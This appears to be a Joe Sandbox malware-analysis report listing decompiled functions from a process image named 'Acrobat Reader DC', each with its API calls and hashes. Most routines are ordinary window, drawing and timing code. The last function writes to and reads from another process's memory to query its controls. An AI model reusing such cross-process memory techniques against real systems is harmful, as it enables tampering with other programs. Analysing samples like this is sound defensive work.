                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: RectWindow
                                  • String ID:
                                  • API String ID: 861336768-0
                                  • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                  • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                  • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                  • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004478AC(struct HWND__* _a4, signed int _a8, signed short _a12, signed short _a16) {
                                  				struct tagPOINT _v12;
                                  				void* _t24;
                                  				signed int _t25;
                                  				signed int _t26;
                                  				intOrPtr _t31;
                                  				int _t41;
                                  				intOrPtr _t42;
                                  				intOrPtr _t44;
                                  				intOrPtr _t45;
                                  				intOrPtr _t47;
                                  				struct HWND__** _t56;
                                  				struct HWND__* _t57;
                                  
                                  				_t41 = _a8;
                                  				_t57 = _a4;
                                  				_t25 = E00430C09(_t24, 0x4a8630, _t57);
                                  				_t42 =  *0x4a8690; // 0x0
                                  				_t56 =  *( *(_t42 + _t25 * 4));
                                  				if(_t41 != _t57) {
                                  					_t26 = E00441B7C(0x4a8630, _t41);
                                  					_a8 = _t26;
                                  					if(_t26 == 0xffffffff) {
                                  						goto L3;
                                  					} else {
                                  						_t44 =  *0x4a86a4; // 0xa71980
                                  						_t45 =  *((intOrPtr*)( *((intOrPtr*)(_t44 + _t26 * 4))));
                                  						_t31 =  *((intOrPtr*)(_t45 + 0x88));
                                  						if(_t31 == 0xe || _t31 == 0xf || _t31 == 0x13 || _t31 == 0x10 ||  *((intOrPtr*)(_t45 + 8)) == 0) {
                                  							goto L3;
                                  						} else {
                                  							GetCursorPos( &_v12);
                                  							_t47 =  *0x4a86a4; // 0xa71980
                                  							return TrackPopupMenuEx( *( *((intOrPtr*)( *((intOrPtr*)(_t47 + _a8 * 4)))) + 8), 0, _v12.x, _v12.y,  *_t56, 0);
                                  						}
                                  					}
                                  				} else {
                                  					if(_t56[0x69] == 0) {
                                  						L3:
                                  						return DefDlgProcW(_t57, 0x7b, _t41, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
                                  					} else {
                                  						GetCursorPos( &_v12);
                                  						return TrackPopupMenuEx(_t56[0x69], 0, _v12, _v12.y, _t57, 0);
                                  					}
                                  				}
                                  			}
















                                  APIs
                                  • GetCursorPos.USER32(?), ref: 004478E2
                                  • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                  • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                  • GetCursorPos.USER32(00000000), ref: 0044796A
                                  • TrackPopupMenuEx.USER32(?,00000000,00000000,?,?,00000000), ref: 00447991
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CursorMenuPopupTrack$Proc
                                  • String ID:
                                  • API String ID: 1300944170-0
                                  • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                  • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                  • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                  • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 96%
                                  			E004479A0(struct HWND__* _a4, int _a8, signed short _a12, signed short _a16) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				struct tagRECT _v28;
                                  				struct tagPOINT _v36;
                                  				struct tagPOINT _v44;
                                  				void* _t30;
                                  				intOrPtr _t32;
                                  				long _t38;
                                  				intOrPtr _t43;
                                  				struct HWND__* _t47;
                                  				signed int _t48;
                                  				intOrPtr _t53;
                                  				intOrPtr _t61;
                                  				intOrPtr _t66;
                                  				struct HWND__* _t75;
                                  
                                  				_t75 = _a4;
                                  				_t71 = E00430C09(_t30, 0x4a8630, _t75);
                                  				_t32 =  *0x4a8690; // 0x0
                                  				_t53 =  *((intOrPtr*)( *((intOrPtr*)(_t32 + _t31 * 4))));
                                  				GetClientRect(_t75,  &_v28);
                                  				GetCursorPos( &_v36);
                                  				_v44.x = _v36.x;
                                  				_v44.y = _v36.y;
                                  				ScreenToClient(_t75,  &_v44);
                                  				_t38 = _v44.x;
                                  				if(_t38 < _v28.left || _t38 > _v12) {
                                  					L12:
                                  					return DefDlgProcW(_t75, 0x20, _a8, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
                                  				} else {
                                  					_t43 = _v36.y;
                                  					if(_t43 < _v28.bottom || _t43 > _v8) {
                                  						goto L12;
                                  					} else {
                                  						if( *((char*)(_t53 + 0x16c)) == 0) {
                                  							L11:
                                  							_t66 =  *0x4a8690; // 0x0
                                  							E00430737( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t66 + _t71 * 4)))) + 0x10)));
                                  							if( *((intOrPtr*)(_t53 + 0x14)) != 0) {
                                  								goto L10;
                                  							} else {
                                  								goto L12;
                                  							}
                                  						} else {
                                  							_push(_v28.top);
                                  							_t47 = WindowFromPoint(_v28);
                                  							if(_t47 == 0 || _t47 == _t75) {
                                  								goto L11;
                                  							} else {
                                  								_t48 = E00441B7C(0x4a8630, _t47);
                                  								if(_t48 == 0xffffffff) {
                                  									goto L11;
                                  								} else {
                                  									_t61 =  *0x4a86a4; // 0xa71980
                                  									_t50 =  *( *((intOrPtr*)( *((intOrPtr*)(_t61 + _t48 * 4)))) + 0x7c) & 0x0000ffff;
                                  									if(( *( *((intOrPtr*)( *((intOrPtr*)(_t61 + _t48 * 4)))) + 0x7c) & 0x0000ffff) == 0xffff) {
                                  										goto L11;
                                  									} else {
                                  										E00430737(_t50);
                                  										L10:
                                  										return 1;
                                  									}
                                  								}
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}



















                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Client$CursorFromPointProcRectScreenWindow
                                  • String ID:
                                  • API String ID: 1822080540-0
                                  • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                  • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                  • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                  • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E00445870(void* __ebx, intOrPtr _a4, struct HWND__* _a8) {
                                  				void* __edi;
                                  				void* __esi;
                                  				WCHAR* _t22;
                                  				long _t24;
                                  				intOrPtr _t26;
                                  				long _t31;
                                  				void* _t34;
                                  				int _t35;
                                  				signed int _t44;
                                  				intOrPtr _t45;
                                  				struct HWND__* _t46;
                                  				WCHAR* _t47;
                                  				void* _t48;
                                  				void* _t49;
                                  				signed int _t54;
                                  
                                  				_t34 = __ebx;
                                  				_t46 = _a8;
                                  				if(IsWindowVisible(_t46) != 0 ||  *((char*)(_a4 + 5)) == 1) {
                                  					_t44 = SendMessageW(_t46, 0xe, 0, 0);
                                  					_t54 = _t44;
                                  					if(_t54 == 0) {
                                  						_t44 = 0x7fff;
                                  					}
                                  					_push(_t34);
                                  					_t4 = _t44 + 1; // 0x1
                                  					_t35 = _t4;
                                  					_push( ~(0 | _t54 > 0x00000000) | _t35 * 0x00000002);
                                  					_t22 = E004115D7(_t44, _t46, _t54);
                                  					_t49 = _t48 + 4;
                                  					_t47 = _t22;
                                  					_t24 = SendMessageW(_a8, 0xd, _t35, _t47);
                                  					_t47[_t44] = 0;
                                  					if(_t24 > 0) {
                                  						_t45 = _a4;
                                  						__eflags =  *((intOrPtr*)(_t45 + 0xc));
                                  						if( *((intOrPtr*)(_t45 + 0xc)) == 0) {
                                  							_t31 = E004111C1(_t47);
                                  							_t49 = _t49 + 4;
                                  							CharUpperBuffW(_t47, _t31);
                                  						}
                                  						_t26 = E004134BD(_t47,  *((intOrPtr*)(_t45 + 0x24)));
                                  						_t49 = _t49 + 8;
                                  						_push(_t47);
                                  						__eflags = _t26;
                                  						if(_t26 == 0) {
                                  							goto L6;
                                  						} else {
                                  							 *((char*)(_t45 + 0xe8)) = 1;
                                  							E004111DC();
                                  							__eflags = 0;
                                  							return 0;
                                  						}
                                  					} else {
                                  						_push(_t47);
                                  						L6:
                                  						E004111DC();
                                  						goto L7;
                                  					}
                                  				} else {
                                  					L7:
                                  					return 1;
                                  				}
                                  			}



















                                  APIs
                                  • IsWindowVisible.USER32 ref: 00445879
                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                  • _wcslen.LIBCMT ref: 004458FB
                                  • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                  • String ID:
                                  • API String ID: 3087257052-0
                                  • Opcode ID: 40d03142f7c4b893e7ee3f174c8354c03563b4f575d30d0b3a1bb9a9e66914fb
                                  • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                  • Opcode Fuzzy Hash: 40d03142f7c4b893e7ee3f174c8354c03563b4f575d30d0b3a1bb9a9e66914fb
                                  • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0044719B(struct HDC__* _a4, intOrPtr _a8, intOrPtr _a12, long _a16, long _a20) {
                                  				struct tagLOGBRUSH _v16;
                                  				intOrPtr _t11;
                                  				void* _t14;
                                  				void* _t17;
                                  				long _t21;
                                  				void* _t22;
                                  				long _t23;
                                  				intOrPtr _t24;
                                  				struct HDC__* _t25;
                                  				void* _t27;
                                  				void* _t28;
                                  				void* _t29;
                                  
                                  				_t21 = _a16;
                                  				_t24 = _a8;
                                  				_t23 = _a20;
                                  				if(_t24 == 0xffffffff) {
                                  					L10:
                                  					_t25 = _a4;
                                  					L11:
                                  					_t11 = _a12;
                                  					if(_t11 == 0xffffffff) {
                                  						L14:
                                  						return _t11;
                                  					}
                                  					_t35 = _t11 - 0xfffffffe;
                                  					if(_t11 == 0xfffffffe) {
                                  						goto L14;
                                  					}
                                  					return SelectObject(_t25, E00441432(_t22, _t35, _t11, 0));
                                  				}
                                  				_t27 =  *0x4a86f4 - _t24; // 0x0
                                  				if(_t27 != 0) {
                                  					L4:
                                  					_t14 =  *0x4a86e4; // 0x0
                                  					if(_t14 != 0) {
                                  						DeleteObject(_t14);
                                  						 *0x4a86e4 = 0;
                                  					}
                                  					 *0x4a86f0 = _t23;
                                  					 *0x4a86f4 = _t24;
                                  					 *0x4a86f8 = _t21;
                                  					_v16.lbStyle = 0;
                                  					_v16.lbColor = _t24;
                                  					_v16.lbHatch = 0;
                                  					if(_t23 != 1) {
                                  						_t21 = _t21 | 0x00010000;
                                  					}
                                  					_t17 = ExtCreatePen(_t21, _t23,  &_v16, 0, 0);
                                  					_t25 = _a4;
                                  					 *0x4a86e4 = _t17;
                                  					 *0x4a86e8 = SelectObject(_t25, _t17);
                                  					if( *0x4a86ec == 0) {
                                  						BeginPath(_t25);
                                  						 *0x4a86ec = 1;
                                  					}
                                  					goto L11;
                                  				}
                                  				_t28 =  *0x4a86f0 - _t23; // 0x0
                                  				if(_t28 != 0) {
                                  					goto L4;
                                  				}
                                  				_t29 =  *0x4a86f8 - _t21; // 0x0
                                  				if(_t29 == 0) {
                                  					goto L10;
                                  				}
                                  				goto L4;
                                  			}















                                  APIs
                                  • DeleteObject.GDI32(00000000), ref: 004471D8
                                  • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                  • SelectObject.GDI32(?,00000000), ref: 00447228
                                  • BeginPath.GDI32(?), ref: 0044723D
                                  • SelectObject.GDI32(?,00000000), ref: 00447266
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Object$Select$BeginCreateDeletePath
                                  • String ID:
                                  • API String ID: 2338827641-0
                                  • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                  • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                  • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                  • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 77%
                                  			E00434582(int __eax, long long __fp0, long _a4) {
                                  				intOrPtr _v8;
                                  				union _LARGE_INTEGER _v12;
                                  				union _LARGE_INTEGER _v20;
                                  				intOrPtr _v24;
                                  				intOrPtr _v28;
                                  				long long _v36;
                                  				long long _v44;
                                  				signed char _t17;
                                  				long _t25;
                                  				long _t26;
                                  
                                  				_t27 = __fp0;
                                  				_t13 = __eax;
                                  				_t25 = _a4;
                                  				_t26 = _t25;
                                  				if(_t26 < 0) {
                                  					return __eax;
                                  				} else {
                                  					if(_t26 != 0) {
                                  						if(_t25 >= 0xf) {
                                  							L10:
                                  							Sleep(_t25);
                                  							return _t13;
                                  						}
                                  						_t13 = QueryPerformanceCounter( &_v20);
                                  						if(_t13 == 0) {
                                  							goto L10;
                                  						}
                                  						_a4 = _t25;
                                  						asm("fild dword [ebp+0x8]");
                                  						if(_t25 < 0) {
                                  							_t27 = __fp0 +  *0x48cd18;
                                  						}
                                  						_v44 = _t27;
                                  						do {
                                  							Sleep(0);
                                  							QueryPerformanceCounter( &_v12);
                                  							asm("sbb eax, [ebp-0xc]");
                                  							_v28 = _v12.LowPart - _v20.LowPart;
                                  							_v24 = _v8;
                                  							asm("fild qword [ebp-0x18]");
                                  							_v36 = _t27;
                                  							_t17 = E0040DBD0(_v8);
                                  							asm("fdivr qword [ebp-0x20]");
                                  							asm("fcomp qword [ebp-0x28]");
                                  							asm("fnstsw ax");
                                  						} while ((_t17 & 0x00000005) != 0);
                                  						return _t17;
                                  					} else {
                                  						Sleep(0);
                                  						return _t13;
                                  					}
                                  				}
                                  			}













                                  APIs
                                  • Sleep.KERNEL32(00000000), ref: 00434598
                                  • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                  • Sleep.KERNEL32(00000000), ref: 004345D4
                                  • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CounterPerformanceQuerySleep
                                  • String ID:
                                  • API String ID: 2875609808-0
                                  • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                  • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                  • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                  • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0042FD29(struct HDC__* _a4, intOrPtr _a8) {
                                  				void* _t3;
                                  				void* _t5;
                                  				int _t6;
                                  				intOrPtr _t10;
                                  				struct HDC__* _t11;
                                  
                                  				_t11 = _a4;
                                  				_t10 = _a8;
                                  				if( *0x4a86ec != 0) {
                                  					EndPath(_t11);
                                  					 *0x4a86ec = 0;
                                  					if(_t10 == 0xffffffff || _t10 == 0xfffffffe) {
                                  						StrokePath(_t11);
                                  					} else {
                                  						StrokeAndFillPath(_t11);
                                  					}
                                  				}
                                  				_t3 =  *0x4a86e8; // 0x0
                                  				if(_t3 == 0) {
                                  					return _t3;
                                  				} else {
                                  					SelectObject(_t11, _t3);
                                  					_t5 =  *0x4a86e4; // 0x0
                                  					 *0x4a86e8 = 0;
                                  					_t6 = DeleteObject(_t5);
                                  					 *0x4a86e4 = 0;
                                  					 *0x4a86f4 = 0xffffffff;
                                  					return _t6;
                                  				}
                                  			}








                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                  • String ID:
                                  • API String ID: 2625713937-0
                                  • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                  • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                  • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                  • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 77%
                                  			E00417803(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                  				signed int _t12;
                                  				void* _t25;
                                  				void* _t28;
                                  				intOrPtr _t29;
                                  				void* _t30;
                                  				void* _t31;
                                  
                                  				_t31 = __eflags;
                                  				_t26 = __edi;
                                  				_t25 = __edx;
                                  				_t20 = __ebx;
                                  				_push(0xc);
                                  				_push(0x48d128);
                                  				E00416C70(__ebx, __edi, __esi);
                                  				_t28 = E00417A69(__ebx, _t31);
                                  				_t12 =  *0x490800; // 0xfffffffe
                                  				if(( *(_t28 + 0x70) & _t12) == 0) {
                                  					L6:
                                  					E004182CB(_t20, _t26, 0xc);
                                  					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                                  					_t29 = _t28 + 0x6c;
                                  					 *((intOrPtr*)(_t30 - 0x1c)) = E004177B6(_t29,  *0x490a48);
                                  					 *(_t30 - 4) = 0xfffffffe;
                                  					E00417870();
                                  				} else {
                                  					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
                                  					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                  						goto L6;
                                  					} else {
                                  						_t29 =  *((intOrPtr*)(E00417A69(_t20, _t33) + 0x6c));
                                  					}
                                  				}
                                  				_t34 = _t29;
                                  				if(_t29 == 0) {
                                  					_push(0x20);
                                  					E00411924(_t25, _t34);
                                  				}
                                  				return E00416CB5(_t29);
                                  			}









                                  APIs
                                  • __getptd.LIBCMT ref: 0041780F
                                    • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                    • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                  • __getptd.LIBCMT ref: 00417826
                                  • __amsg_exit.LIBCMT ref: 00417834
                                  • __lock.LIBCMT ref: 00417844
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 938513278-0
                                  • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                  • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                  • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                  • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 95%
                                  			E0043659E(struct HWND__** _a4, char _a8, intOrPtr* _a12) {
                                  				intOrPtr _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				void* _v24;
                                  				signed int _v32;
                                  				intOrPtr _v36;
                                  				char _v40;
                                  				char _v168;
                                  				void* __edi;
                                  				intOrPtr _t58;
                                  				struct HWND__** _t83;
                                  				struct HWND__* _t95;
                                  				char* _t100;
                                  				struct HWND__** _t101;
                                  				long _t106;
                                  				long _t107;
                                  
                                  				_t83 = _a4;
                                  				E00410620( &_v168);
                                  				_v24 = _a8;
                                  				_t106 = E004343AD( &_v168, 0x10,  *_t83);
                                  				E00434319( &_v168,  &_v24, _t106, 0x10);
                                  				_t95 =  *_t83;
                                  				SendMessageW(_t95, 0x1104, 0, _t106);
                                  				E004342DD( &_v168, _t106,  &_v24, 0x10);
                                  				_t101 = _v24;
                                  				asm("cdq");
                                  				_t58 = (_v12 - _v20 - _t95 >> 1) + _v20;
                                  				 *((intOrPtr*)(_a12 + 4)) = _t58;
                                  				_v36 = _t58;
                                  				_t107 = E004343AD( &_v168, 0x10,  *_t83);
                                  				if(_t101 > _v16) {
                                  					L6:
                                  					E00410640( &_v168);
                                  					return 0;
                                  				} else {
                                  					while(1) {
                                  						_v40 = _t101;
                                  						E00434319( &_v168,  &_v40, _t107, 0x10);
                                  						SendMessageW( *_t83, 0x1111, 0, _t107);
                                  						E004342DD( &_v168, _t107,  &_v40, 0x10);
                                  						if((_v32 & 0x00000040) != 0) {
                                  							break;
                                  						}
                                  						_t101 = _t101 + 1;
                                  						if(_t101 <= _v16) {
                                  							continue;
                                  						} else {
                                  							E00410640( &_v168);
                                  							return 0;
                                  						}
                                  						goto L13;
                                  					}
                                  					if(_t101 <= _v16) {
                                  						_a4 = _t101;
                                  						while(1) {
                                  							_v40 = _t101;
                                  							E00434319( &_v168,  &_v40, _t107, 0x10);
                                  							SendMessageW( *_t83, 0x1111, 0, _t107);
                                  							_t100 =  &_v168;
                                  							E004342DD(_t100, _t107,  &_v40, 0x10);
                                  							if((_v32 & 0x00000040) == 0) {
                                  								break;
                                  							}
                                  							_t101 = _t101 + 1;
                                  							if(_t101 <= _v16) {
                                  								continue;
                                  							} else {
                                  								E00410640( &_v168);
                                  								return 0;
                                  							}
                                  							goto L13;
                                  						}
                                  						if(_t101 > _v16) {
                                  							goto L6;
                                  						} else {
                                  							asm("cdq");
                                  							 *_a12 = _a4 + (_t101 - _a4 - _t100 >> 1);
                                  							E00410640( &_v168);
                                  							return 1;
                                  						}
                                  					} else {
                                  						goto L6;
                                  					}
                                  				}
                                  				L13:
                                  			}




















                                  APIs
                                    • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                    • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                    • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
